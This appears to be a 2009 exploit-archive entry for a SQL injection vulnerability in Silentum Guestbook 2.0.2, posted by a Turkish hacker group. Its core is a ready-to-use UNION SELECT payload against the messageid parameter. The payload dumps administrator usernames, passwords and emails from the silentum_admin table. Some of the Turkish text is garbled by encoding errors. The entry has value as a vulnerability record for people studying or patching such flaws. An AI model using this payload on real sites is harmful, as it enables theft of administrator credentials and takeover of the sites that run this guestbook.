[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln
# Published : 2009-07-20
# Author : Bgh7
# Previous Title : Meta Search Engine Script (url) Local File Disclosure Vulnerability
# Next Title : Netrix CMS 1.0 Authentication Bypass Vulnerability


##Silentum Guestbook v2.0.2 (silentum_guestbook.php) Sql Injection Vuln.
#######################################################################
#######################################################################
##Yazar: Bgh7
##
##Turk Bilisim Gucleri Group / Ihlilal Hatti
##
##ByBgh7[a]msn.com
##
##Http://Bgh7.Blogspot.Com
##
##Bug: Sql Injection
##
##?°ndir/Download: http://hypersilence.net/silentum_guestbook.php
##
##Biz ki neler g??rd??k, biz ki neler ?§ektik... 2-3 ??ekik g??zl??den mi korkaca???±z ?
##??in s??m??recek bir rezerv daha buldu??unu san?±yor, yaz?±k...
#######################################################################
#######################################################################
Sql: silentum_guestbook.php?messageid=-1 UNION ALL SELECT 0,0,0,0,concat(u_name,0x3a,u_password,0x3a,u_email),0,0 FROM silentum_admin/**
#######################################################################
#######################################################################
Thanks: m3rcil3sS & GhostKing & milw0rm & All Turk?±sh Attackers

# www.Syue.com [2009-07-20]